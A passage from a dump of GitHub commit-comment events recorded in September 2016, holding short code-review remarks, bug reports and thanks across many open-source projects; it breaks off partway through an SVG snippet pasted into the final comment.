{"id":"4513455610","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"athoik/enigma2"},"payload":{"comment":{"id":18892496,"position":null,"line":null,"path":null,"commit_id":"f819dbefd2536320181caa71e763481a96a91c63","created_at":"2016-09-04T09:14:55Z","updated_at":"2016-09-04T09:14:55Z","body":"I suggest:\r\n`slot.isCompatible(\"DVB-T\") or slot.isCompatible(\"DVB-S\") and slot.canBeCompatible(\"DVB-T\")`\r\nThat way this only affects tuners that are configured as DVB-S. If the tuner is configured as DVB-C this clause will fail and the slot will not be appended, which is the desired behaviour."}},"created_at":"2016-09-04T09:14:55Z"}
{"id":"4513457413","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":18892499,"position":null,"line":null,"path":null,"commit_id":"2331e218dc88408c5cb2db9a7b5f9ebbed82e2d6","created_at":"2016-09-04T09:16:43Z","updated_at":"2016-09-04T09:16:43Z","body":"Me too! Your idea of tuning a lookup index was quite helpful!\r\nEven though the patch is now struggling at STC."}},"created_at":"2016-09-04T09:16:43Z"}
{"id":"4513458314","type":"CommitCommentEvent","actor":{"login":"hiendv"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18892501,"position":null,"line":null,"path":null,"commit_id":"1ff18ce3be610032837a7feed33680fc14c569c6","created_at":"2016-09-04T09:17:35Z","updated_at":"2016-09-04T09:17:35Z","body":"@taylorotwell Hi, would you mind explain to me why only `GET /login` is named? From my point of view\r\n- Login `GET /login` & `POST /login`\r\n- Logout `POST /logout`\r\n- Register `GET /register` & `POST /register`\r\n- Password reset routes\r\nshare the same priority. Thank you."}},"created_at":"2016-09-04T09:17:35Z"}
{"id":"4513460130","type":"CommitCommentEvent","actor":{"login":"drtikv"},"repo":{"name":"blackrow67/android-1"},"payload":{"comment":{"id":18892504,"position":2,"line":0,"path":"caf.xml","commit_id":"0d07d7cc3f5a3d8b03e71d3d59798e4010723182","created_at":"2016-09-04T09:19:29Z","updated_at":"2016-09-04T09:19:29Z","body":"# Lol free place😂😂😂😂"}},"created_at":"2016-09-04T09:19:29Z"}
{"id":"4513460230","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"xnuk/cgitc"},"payload":{"comment":{"id":18892505,"position":null,"line":null,"path":null,"commit_id":"a4825982610d4f20beca9c367ec4b7f4854bb100","created_at":"2016-09-04T09:19:35Z","updated_at":"2016-09-04T09:19:35Z","body":"PR날려주세요 (?)"}},"created_at":"2016-09-04T09:19:35Z"}
{"id":"4513460923","type":"CommitCommentEvent","actor":{"login":"paul-michalik"},"repo":{"name":"d-led/persistent_observable_experiment"},"payload":{"comment":{"id":18892506,"position":null,"line":null,"path":null,"commit_id":"4efd5a6c0ba25585e3ff952a9a3d52959d105a99","created_at":"2016-09-04T09:20:11Z","updated_at":"2016-09-04T09:20:11Z","body":"I'd add `isEmpty` predicate. Other alternatives: the `TryDequeue` pattern, `Count` property..."}},"created_at":"2016-09-04T09:20:11Z"}
{"id":"4513461287","type":"CommitCommentEvent","actor":{"login":"fjug"},"repo":{"name":"scijava/scijava-common"},"payload":{"comment":{"id":18892507,"position":null,"line":null,"path":null,"commit_id":"e3453f26f2be119cbf0a48f812913df89f45321f","created_at":"2016-09-04T09:20:25Z","updated_at":"2016-09-04T09:20:25Z","body":"Sweet! Thanks!"}},"created_at":"2016-09-04T09:20:25Z"}
{"id":"4513462200","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892508,"position":81,"line":60,"path":"youtube_dl/extractor/nytimes.py","commit_id":"4191779dcda8a80faf6e53579e011b63ee5c3878","created_at":"2016-09-04T09:21:18Z","updated_at":"2016-09-04T09:21:18Z","body":"I guess DASH is skipped to avoid merging failures? If so please add a comment here."}},"created_at":"2016-09-04T09:21:18Z"}
{"id":"4513464960","type":"CommitCommentEvent","actor":{"login":"skovhus"},"repo":{"name":"brigand/babel-plugin-flow-react-proptypes"},"payload":{"comment":{"id":18892513,"position":null,"line":null,"path":null,"commit_id":"24a0522f5cd078d44a55fcd1deed2abbf670419f","created_at":"2016-09-04T09:23:40Z","updated_at":"2016-09-04T09:23:40Z","body":"Hi @brigand \r\n\r\nSomething went wrong when publishing this... Version 0.9.2 does not contain any handling of `TupleTypeAnnotation`. "}},"created_at":"2016-09-04T09:23:40Z"}
{"id":"4513465317","type":"CommitCommentEvent","actor":{"login":"axelronquist"},"repo":{"name":"axelronquist/Snak"},"payload":{"comment":{"id":18892514,"position":null,"line":null,"path":null,"commit_id":"5170c6e3522cbd90aa146098bc54cbeb7bf03855","created_at":"2016-09-04T09:24:02Z","updated_at":"2016-09-04T09:24:02Z","body":"This is a comment on this commit."}},"created_at":"2016-09-04T09:24:02Z"}
{"id":"4513465461","type":"CommitCommentEvent","actor":{"login":"axelronquist"},"repo":{"name":"axelronquist/Snak"},"payload":{"comment":{"id":18892515,"position":null,"line":null,"path":null,"commit_id":"5170c6e3522cbd90aa146098bc54cbeb7bf03855","created_at":"2016-09-04T09:24:10Z","updated_at":"2016-09-04T09:24:10Z","body":"Haha!"}},"created_at":"2016-09-04T09:24:10Z"}
{"id":"4513468100","type":"CommitCommentEvent","actor":{"login":"brigand"},"repo":{"name":"brigand/babel-plugin-flow-react-proptypes"},"payload":{"comment":{"id":18892518,"position":null,"line":null,"path":null,"commit_id":"24a0522f5cd078d44a55fcd1deed2abbf670419f","created_at":"2016-09-04T09:26:24Z","updated_at":"2016-09-04T09:26:24Z","body":"Oops, forgot to build before publishing. Thanks. Pushed as 0.9.3"}},"created_at":"2016-09-04T09:26:24Z"}
{"id":"4513468592","type":"CommitCommentEvent","actor":{"login":"Nekotekina"},"repo":{"name":"RPCS3/rpcs3"},"payload":{"comment":{"id":18892520,"position":4,"line":8,"path":"rpcs3/Emu/RSX/gcm_enums.cpp","commit_id":"ebf54d6acdce7b0f33153810c8eca7ccb11f54d2","created_at":"2016-09-04T09:26:51Z","updated_at":"2016-09-04T09:26:51Z","body":"What the bullshit?"}},"created_at":"2016-09-04T09:26:51Z"}
{"id":"4513469527","type":"CommitCommentEvent","actor":{"login":"boxa"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18892524,"position":5,"line":62,"path":"src/game/AI/CreatureAISelector.cpp","commit_id":"8835ddf39694260c2234c0ca4b3c54e705aa44ff","created_at":"2016-09-04T09:27:36Z","updated_at":"2016-09-04T09:27:36Z","body":"ERROR: CreatureEventAI:EventMap for Creature 28017 is empty but creature is using CreatureEventAI.\r\nERROR: CreatureEventAI:EventMap for Creature 26125 is empty but creature is using CreatureEventAI.\r\nhere: https://github.com/cmangos/mangos-wotlk/blob/master/src/game/AI/CreatureEventAI.cpp#L151\r\n\r\nwhen apply GuardianAI on creature with empty events."}},"created_at":"2016-09-04T09:27:36Z"}
{"id":"4513471740","type":"CommitCommentEvent","actor":{"login":"skovhus"},"repo":{"name":"brigand/babel-plugin-flow-react-proptypes"},"payload":{"comment":{"id":18892529,"position":null,"line":null,"path":null,"commit_id":"24a0522f5cd078d44a55fcd1deed2abbf670419f","created_at":"2016-09-04T09:29:40Z","updated_at":"2016-09-04T09:29:40Z","body":"👍 "}},"created_at":"2016-09-04T09:29:40Z"}
{"id":"4513472805","type":"CommitCommentEvent","actor":{"login":"lightmare"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18892531,"position":12,"line":12,"path":"scripts/is_pr_merge.sh","commit_id":"240bedcbeeb8d8583706bbca61b87c27b1a29758","created_at":"2016-09-04T09:30:29Z","updated_at":"2016-09-04T09:30:29Z","body":"> @springmeyer ... preventing any publishing from any PR.\r\n\r\nYes, but it's no different from what you want here.\r\n\r\nThere's only one PR build, which checks out an auto-generated [merge](https://travis-ci.org/mapnik/node-mapnik/jobs/49569461#L75) commit (merging it onto the branch the PR targets). The \"normal\" is a regular branch build that is done regardless of whether a PR is created off that branch or not. That's the one where travis checks out exactly what you commited.\r\n\r\n\r\nThe only difference between `$TRAVIS_PULL_REQUEST` and this script I see is when you push some locally-created merge commit, `git log --no-merges` will skip it and this will incorrectly echo `true`.\r\n"}},"created_at":"2016-09-04T09:30:29Z"}
{"id":"4513474711","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"geneura-papers/nowcasting-traffic"},"payload":{"comment":{"id":18892533,"position":null,"line":null,"path":null,"commit_id":"b47073905bad309ea37d269e8e0be44569be3907","created_at":"2016-09-04T09:32:10Z","updated_at":"2016-09-04T09:32:10Z","body":"It didn't take long. Don't remember exactly how mucy, but I used default parameters and it took maybe 15 minutes. Would that be enough?"}},"created_at":"2016-09-04T09:32:10Z"}
{"id":"4513476077","type":"CommitCommentEvent","actor":{"login":"barrontang"},"repo":{"name":"barrontang/Hello-world"},"payload":{"comment":{"id":18892535,"position":null,"line":null,"path":null,"commit_id":"3cb899f499467ffddce57d1cfba7bc65401f73d2","created_at":"2016-09-04T09:33:27Z","updated_at":"2016-09-04T09:33:27Z","body":"anything new ?"}},"created_at":"2016-09-04T09:33:27Z"}
{"id":"4513481414","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18892544,"position":21,"line":21,"path":"src/pocketmine/block/WallSign.php","commit_id":"309aad9ac8e67bbe3276027fc8f87853bebb5e05","created_at":"2016-09-04T09:38:49Z","updated_at":"2016-09-04T09:38:49Z","body":"Actually I'm pretty sure this is PocketMine "}},"created_at":"2016-09-04T09:38:49Z"}
{"id":"4513481972","type":"CommitCommentEvent","actor":{"login":"dstillman"},"repo":{"name":"zotero/translation-server"},"payload":{"comment":{"id":18892545,"position":null,"line":null,"path":null,"commit_id":"c6ddee54904ac096d1e3b4c84405641a3b64429a","created_at":"2016-09-04T09:39:24Z","updated_at":"2016-09-04T09:39:24Z","body":"It's reduced from intermediate commits, where I was trying to optimize Docker cache usage during development.\r\n\r\nI'm not interested in automated builds for this, for the same reason we do manual (scripted) dev builds of the Firefox extension: not every commit is suitable for distribution, and pushing manually and having `latest` be the recommended version is easier — for us and for consumers — than managing tags."}},"created_at":"2016-09-04T09:39:24Z"}
{"id":"4513483530","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892550,"position":81,"line":60,"path":"youtube_dl/extractor/nytimes.py","commit_id":"4191779dcda8a80faf6e53579e011b63ee5c3878","created_at":"2016-09-04T09:40:48Z","updated_at":"2016-09-04T09:40:48Z","body":"i don't know exactly what's the problem but i guest that it's an external bug in ffmpeg because it detects that there is both video and audio stream in the segments but it only the video can be played."}},"created_at":"2016-09-04T09:40:48Z"}
{"id":"4513484492","type":"CommitCommentEvent","actor":{"login":"ecdsa"},"repo":{"name":"kivy/kivy"},"payload":{"comment":{"id":18892553,"position":null,"line":null,"path":null,"commit_id":"0e46e3d6b302c94e82843fb08000b0ba12e67bda","created_at":"2016-09-04T09:41:42Z","updated_at":"2016-09-04T09:41:42Z","body":"same problem here. cannot compile after this commit"}},"created_at":"2016-09-04T09:41:42Z"}
{"id":"4513484764","type":"CommitCommentEvent","actor":{"login":"iiio051031448"},"repo":{"name":"NightStark/dbs"},"payload":{"comment":{"id":18892554,"position":7,"line":153,"path":"code/kernel/skb/skb_build.c","commit_id":"c20227fa1ec0f5e35f5804aba848b2fbd07f1583","created_at":"2016-09-04T09:41:57Z","updated_at":"2016-09-04T09:41:57Z","body":"csum_ipv6_magic 这个函数的用法困扰了我好几天"}},"created_at":"2016-09-04T09:41:57Z"}
{"id":"4513485146","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"tsygipova/java_first"},"payload":{"comment":{"id":18892555,"position":22,"line":22,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/BaseHelper.java","commit_id":"2ed44572b10659c6b0d3e5c6476d1a8cb1e13d8d","created_at":"2016-09-04T09:42:17Z","updated_at":"2016-09-04T09:42:17Z","body":"клик здесь не нужен"}},"created_at":"2016-09-04T09:42:17Z"}
{"id":"4513485561","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892557,"position":81,"line":60,"path":"youtube_dl/extractor/nytimes.py","commit_id":"4191779dcda8a80faf6e53579e011b63ee5c3878","created_at":"2016-09-04T09:42:37Z","updated_at":"2016-09-04T09:42:37Z","body":"Seems the reason is ```m3u8_native```. This command works fine for me:\r\n```\r\n$ youtube-dl -v --hls-prefer-ffmpeg \"http://www.nytimes.com/video/world/asia/100000004626062/this-robot-is-greeting-tourists-in-japan.html?playlistId=1194811622182&region=video-grid&version=video-grid-thumbnail&contentCollection=Times+Video&contentPlacement=0&module=recent-videos&action=click&pgType=Multimedia&eventName=video-grid-click\"\r\n```"}},"created_at":"2016-09-04T09:42:37Z"}
{"id":"4513485871","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"tsygipova/java_first"},"payload":{"comment":{"id":18892558,"position":24,"line":24,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/BaseHelper.java","commit_id":"2ed44572b10659c6b0d3e5c6476d1a8cb1e13d8d","created_at":"2016-09-04T09:42:55Z","updated_at":"2016-09-04T09:42:55Z","body":"WebElement element =  wd.findElement(locator);\r\nelement.clear();\r\nelement.sendKeys(text);"}},"created_at":"2016-09-04T09:42:55Z"}
{"id":"4513487080","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892561,"position":null,"line":null,"path":null,"commit_id":"622638512b8241c39837b634e75c44cf9105a299","created_at":"2016-09-04T09:44:06Z","updated_at":"2016-09-04T09:44:06Z","body":"i think it's better to keep delegating the extraction to `InternetVideoArchiveIE`.\r\nwithout delegation:\r\n```\r\npython __main__.py -F http://www.rottentomatoes.com/m/toy_story_3/trailers/11028566/\r\n[RottenTomatoes] 11028566: Downloading webpage\r\n[RottenTomatoes] 11028566: Downloading m3u8 information\r\n[info] Available formats for 11028566:\r\nformat code  extension  resolution note\r\nhls-meta     mp4        multiple   Quality selection URL \r\nhls-259      mp4        audio only  259k , mp4a.40.2@244k\r\nmp4          mp4        unknown    \r\nhls-151      mp4        320x178     151k , avc1.77.31@  65k, mp4a.40.2@ 77k\r\nhls-329      mp4        320x178     329k , avc1.77.31@ 186k, mp4a.40.2@124k\r\nhls-700      mp4        320x178     700k , avc1.77.31@ 416k, mp4a.40.2@244k\r\nhls-988      mp4        480x268     988k , avc1.77.31@ 688k, mp4a.40.2@244k\r\nhls-1779     mp4        720x402    1779k , avc1.77.31@1434k, mp4a.40.2@244k\r\nhls-2901     mp4        1280x715   2901k , avc1.77.31@2493k, mp4a.40.2@244k\r\nhls-5531     mp4        1920x1073  5531k , avc1.77.31@4974k, mp4a.40.2@244k (best)\r\n```\r\nwith delegation:\r\n```\r\npython __main__.py -F http://www.rottentomatoes.com/m/toy_story_3/trailers/11028566/\r\n[RottenTomatoes] 11028566: Downloading webpage\r\n[InternetVideoArchive] 613340: Downloading JSON metadata\r\n[InternetVideoArchive] 613340: Downloading m3u8 information\r\n[info] Available formats for 11028566:\r\nformat code  extension  resolution note\r\nhls-meta     mp4        multiple   Quality selection URL \r\nhls-259      mp4        audio only  259k , mp4a.40.2@244k\r\nhttp-80      mp4        unknown      80k \r\nhls-151      mp4        320x178     151k , avc1.77.31@  65k, mp4a.40.2@ 77k\r\nhttp-212     mp4        unknown     212k \r\nhls-329      mp4        320x178     329k , avc1.77.31@ 186k, mp4a.40.2@124k\r\nhttp-450     mp4        unknown     450k \r\nhls-700      mp4        320x178     700k , avc1.77.31@ 416k, mp4a.40.2@244k\r\nhttp-750     mp4        unknown     750k \r\nhls-988      mp4        480x268     988k , avc1.77.31@ 688k, mp4a.40.2@244k\r\nhttp-1500    mp4        unknown    1500k \r\nhls-1779     mp4        720x402    1779k , avc1.77.31@1434k, mp4a.40.2@244k\r\nhttp-2500    mp4        unknown    2500k \r\nhls-2901     mp4        1280x715   2901k , avc1.77.31@2493k, mp4a.40.2@244k\r\nhls-5531     mp4        1920x1073  5531k , avc1.77.31@4974k, mp4a.40.2@244k (best)\r\n```"}},"created_at":"2016-09-04T09:44:06Z"}
{"id":"4513487650","type":"CommitCommentEvent","actor":{"login":"BertHav"},"repo":{"name":"openwrt-vgv7519/uboot-bin"},"payload":{"comment":{"id":18892562,"position":null,"line":null,"path":null,"commit_id":"76fdd8e638f81e324ffe77856481bd147398f6e8","created_at":"2016-09-04T09:44:36Z","updated_at":"2016-09-04T09:44:36Z","body":"Today the device is successful flashed with uboot and and  lede-lantiq-xrx200-VGV7519NOR-squashfs-sysupgrade.bin. With a cold boot the UART shows the same crippled output, but a u-boot reset shows a clean output. The next hurdle is to configure the device for use with T%lf%rt VDSL and VOIP, but that is not a u-boot issue;). Thanks to The-Lizard and TimelessNL."}},"created_at":"2016-09-04T09:44:36Z"}
{"id":"4513489517","type":"CommitCommentEvent","actor":{"login":"azawawi"},"repo":{"name":"perl6/gtk-simple"},"payload":{"comment":{"id":18892568,"position":null,"line":null,"path":null,"commit_id":"8a6d92ac2a99fb742d3e5b9656632c7dd0f485ab","created_at":"2016-09-04T09:46:19Z","updated_at":"2016-09-04T09:46:19Z","body":"Actually this highlights another design problem with `%?RESOURCES`. It is not platform-specific. We are copying an empty DLL file to satisfy `panda`'s appetite."}},"created_at":"2016-09-04T09:46:19Z"}
{"id":"4513489672","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18892569,"position":4,"line":45,"path":"python/plugins/processing/gui/ConfigDialog.py","commit_id":"6054bb9518786c094cfbafe4f1d1fa77a4dbfd78","created_at":"2016-09-04T09:46:30Z","updated_at":"2016-09-04T09:46:30Z","body":"This is causing an error:\r\n\r\n  File \"/home/webmaster/dev/cpp/QGIS/bm-qt5/output/python/plugins/processing/gui/ConfigDialog.py\", line 46, in \r\n    from qgis.PyQt.QtGui import (QIcon,\r\nImportError: cannot import name 'QPushButton'"}},"created_at":"2016-09-04T09:46:30Z"}
{"id":"4513490001","type":"CommitCommentEvent","actor":{"login":"ljacqu"},"repo":{"name":"AuthMe/AuthMeReloaded"},"payload":{"comment":{"id":18892570,"position":null,"line":null,"path":null,"commit_id":"945c9e9587e5b58ddef33ecedd4f25662ae0f206","created_at":"2016-09-04T09:46:50Z","updated_at":"2016-09-04T09:46:50Z","body":"@ice41, thank you, your PT messages are now in the latest build :)"}},"created_at":"2016-09-04T09:46:50Z"}
{"id":"4513490251","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18892571,"position":null,"line":null,"path":null,"commit_id":"622638512b8241c39837b634e75c44cf9105a299","created_at":"2016-09-04T09:47:06Z","updated_at":"2016-09-04T09:47:06Z","body":"Seems you have a working version that delegates the extraction. Could you push it to master?"}},"created_at":"2016-09-04T09:47:06Z"}
{"id":"4513491270","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"mdvd4/java_pft"},"payload":{"comment":{"id":18892574,"position":5,"line":51,"path":"addressbook-web-tests/src/test/java/lavr/stqa/pft/addressbook/appmanager/ContactHelper.java","commit_id":"399bcd621783d9e1379530167a50e9dd2e76fb3d","created_at":"2016-09-04T09:47:56Z","updated_at":"2016-09-04T09:47:56Z","body":"локатор можно сократить до\r\n//*[@id='maintable']//tr[2]/td[8]/a"}},"created_at":"2016-09-04T09:47:56Z"}
{"id":"4513493098","type":"CommitCommentEvent","actor":{"login":"xushWT"},"repo":{"name":"AllTheHaxx/AllTheHaxx"},"payload":{"comment":{"id":18892575,"position":null,"line":null,"path":null,"commit_id":"92bb0201484918ce83dbc5da14f774d0b5a0b1df","created_at":"2016-09-04T09:49:38Z","updated_at":"2016-09-04T09:49:38Z","body":"Works fine, thanks"}},"created_at":"2016-09-04T09:49:38Z"}
{"id":"4513493939","type":"CommitCommentEvent","actor":{"login":"LinhHa"},"repo":{"name":"LinhHa/Labs"},"payload":{"comment":{"id":18892576,"position":48,"line":48,"path":"lab1_part1_v2/lab1.srcs/sources_1/new/debounce.vhd","commit_id":"d52358415d0d08150b32080ca25cb41c423c74b1","created_at":"2016-09-04T09:50:28Z","updated_at":"2016-09-04T09:50:28Z","body":"This will only count when the button is registered for 10 times when the slow clock is high? What happened when the slow clock is low, and why was the slow clock introduced here?"}},"created_at":"2016-09-04T09:50:28Z"}
{"id":"4513494667","type":"CommitCommentEvent","actor":{"login":"d-led"},"repo":{"name":"d-led/persistent_observable_experiment"},"payload":{"comment":{"id":18892577,"position":null,"line":null,"path":null,"commit_id":"4efd5a6c0ba25585e3ff952a9a3d52959d105a99","created_at":"2016-09-04T09:51:05Z","updated_at":"2016-09-04T09:51:05Z","body":"Thanks! It should probably be `TryDequeue`, as not every persistent queue has a `Count` API, thus, I wouldn't count on it :D. `TryDequeue` is probably a good idea, which is semantically what the current example is doing: either it succeeds, or it throws. \r\n\r\n`isEmpty` is not good if the queue is being emptied concurrently\r\n- `isEmpty` &rarr; `false`\r\n- somebody else empties the queue\r\n- `Dequeue` fails still\r\n"}},"created_at":"2016-09-04T09:51:05Z"}
{"id":"4513496000","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18892582,"position":12,"line":125,"path":"pom.xml","commit_id":"0676842e75d214ee78872ed46106405142e34335","created_at":"2016-09-04T09:52:17Z","updated_at":"2016-09-04T09:52:17Z","body":"You don't need to specify the resources plugin.\r\nThe `project.build.sourceEncoding` property is all you need.\r\n\r\nRemove these plugin definitions from all modules."}},"created_at":"2016-09-04T09:52:17Z"}
{"id":"4513496737","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"semyonova/java_test"},"payload":{"comment":{"id":18892583,"position":14,"line":14,"path":"sandbox/src/main/java/ru/stqa/pft/sandbox/Point.java","commit_id":"ea93fdace8191a6b7545c9a824f89e64c8873e92","created_at":"2016-09-04T09:52:59Z","updated_at":"2016-09-04T09:52:59Z","body":"Добавляем сюда метод\r\npublic static double distance(Point p) {\r\n    return Math.sqrt(pow((x - p.x), 2) + pow((y - p.y), 2));\r\n}"}},"created_at":"2016-09-04T09:52:59Z"}
{"id":"4513497278","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"semyonova/java_test"},"payload":{"comment":{"id":18892584,"position":13,"line":12,"path":"sandbox/src/main/java/ru/stqa/pft/sandbox/MyFirstProgram.java","commit_id":"ea93fdace8191a6b7545c9a824f89e64c8873e92","created_at":"2016-09-04T09:53:30Z","updated_at":"2016-09-04T09:53:30Z","body":"Здесь еще сделаем такой вызов метода см. ниже:\r\np1.distance(p2)"}},"created_at":"2016-09-04T09:53:30Z"}
{"id":"4513499679","type":"CommitCommentEvent","actor":{"login":"AndroidCyprus"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18892587,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-04T09:55:38Z","updated_at":"2016-09-04T09:55:38Z","body":"Ok. Which strings need to be translated?"}},"created_at":"2016-09-04T09:55:38Z"}
{"id":"4513500025","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":18892588,"position":10,"line":10,"path":"HelloWorld/Program.cs","commit_id":"f9db389d47d0ad3ad2958d0bda888650e0aecb57","created_at":"2016-09-04T09:55:58Z","updated_at":"2016-09-04T09:55:58Z","body":" В этом примере кода все хорошо. Просто демонстрирую комментарии)"}},"created_at":"2016-09-04T09:55:58Z"}
{"id":"4513500181","type":"CommitCommentEvent","actor":{"login":"caspervanneck"},"repo":{"name":"PrismarineMC/Prismarine"},"payload":{"comment":{"id":18892590,"position":null,"line":null,"path":null,"commit_id":"e7bbf81512d57648dbbfe71d75a4ca4fb0496299","created_at":"2016-09-04T09:56:09Z","updated_at":"2016-09-04T09:56:09Z","body":"its note done yet and i need help @va2ron1 @MrGenga "}},"created_at":"2016-09-04T09:56:09Z"}
{"id":"4513500965","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18892591,"position":null,"line":null,"path":null,"commit_id":"c8b675b4cd13c20518e519dabdcb1010cbf10cd0","created_at":"2016-09-04T09:56:54Z","updated_at":"2016-09-04T09:56:54Z","body":"Addresses #42 "}},"created_at":"2016-09-04T09:56:54Z"}
{"id":"4513501061","type":"CommitCommentEvent","actor":{"login":"Musda"},"repo":{"name":"yescallop/EssentialsNK"},"payload":{"comment":{"id":18892592,"position":null,"line":null,"path":null,"commit_id":"54ca96e34adcf2163677529c61901747edc0a712","created_at":"2016-09-04T09:57:01Z","updated_at":"2016-09-04T09:57:01Z","body":"Add English Support"}},"created_at":"2016-09-04T09:57:01Z"}
{"id":"4514608034","type":"CommitCommentEvent","actor":{"login":"Gethe"},"repo":{"name":"RealUI/RealUI"},"payload":{"comment":{"id":18894609,"position":null,"line":null,"path":null,"commit_id":"97ad2b908d96b2bb0bd04c43c732a8ab92238f13","created_at":"2016-09-05T00:00:17Z","updated_at":"2016-09-05T00:00:17Z","body":"tbh, i just forgot. Was just trying to get something out to help the issue for RealUI, but i was also still leveling at the time and it just slipped my mind."}},"created_at":"2016-09-05T00:00:17Z"}
{"id":"4514610264","type":"CommitCommentEvent","actor":{"login":"mlantz"},"repo":{"name":"YABhq/CrudMaker"},"payload":{"comment":{"id":18894614,"position":null,"line":null,"path":null,"commit_id":"c46d9e5382dc65140092ef25b8b5641aed67b997","created_at":"2016-09-05T00:01:45Z","updated_at":"2016-09-05T00:01:45Z","body":"More of a moving forward thing. Laracogs uses this so whatever happens here is the CrudMaker in Laracogs, however, Laracogs 1.9.8 is locked with older versions of the CrudMaker, Crypto, and FormMaker. "}},"created_at":"2016-09-05T00:01:45Z"}
{"id":"4514613698","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18894616,"position":84,"line":310,"path":"plugins/XmlMaterialProfile/XmlMaterialProfile.py","commit_id":"bacac1e42e48e240ed2e6e71df999c7e54933de2","created_at":"2016-09-05T00:04:36Z","updated_at":"2016-09-05T00:04:36Z","body":"Me too. Perhaps that works a little differently with the slice on the left-hand side? Python has a lot of those nooks and crannies."}},"created_at":"2016-09-05T00:04:36Z"}
{"id":"4514613973","type":"CommitCommentEvent","actor":{"login":"juanibls"},"repo":{"name":"juanibls/prueba2.github.io"},"payload":{"comment":{"id":18894618,"position":null,"line":null,"path":null,"commit_id":"bff8ec031ec929581f3eb587420aa89373449588","created_at":"2016-09-05T00:04:50Z","updated_at":"2016-09-05T00:04:50Z","body":"`<svg width=\"847\" height=\"500\" xmlns=\"http://www.w3.org/2000/svg\"><g><g class=\"x axis\" transform=\"translate(0,460)\" style=\"stroke-width: 1px; font-size: 10px; font-family: Arial, Helvetica;\"><g class=\"tick\" transform=\"translate(112.71428571428571,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">10</text></g><g class=\"tick\" transform=\"translate(207.95238095238093,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">20</text></g><g class=\"tick\" transform=\"translate(303.1904761904762,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">30</text></g><g class=\"tick\" transform=\"translate(398.4285714285714,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">40</text></g><g class=\"tick\" transform=\"translate(493.66666666666663,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">50</text></g><g class=\"tick\" transform=\"translate(588.9047619047618,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">60</text></g><g class=\"tick\" transform=\"translate(684.1428571428571,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">70</text></g><g class=\"tick\" transform=\"translate(779.3809523809524,0)\" style=\"opacity: 1;\"><line y2=\"-440\" x2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text y=\"3\" x=\"0\" dy=\".71em\" style=\"text-anchor: middle;\">80</text></g><path class=\"domain\" d=\"M27,-440V0H827V-440\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></path></g><g class=\"y axis\" 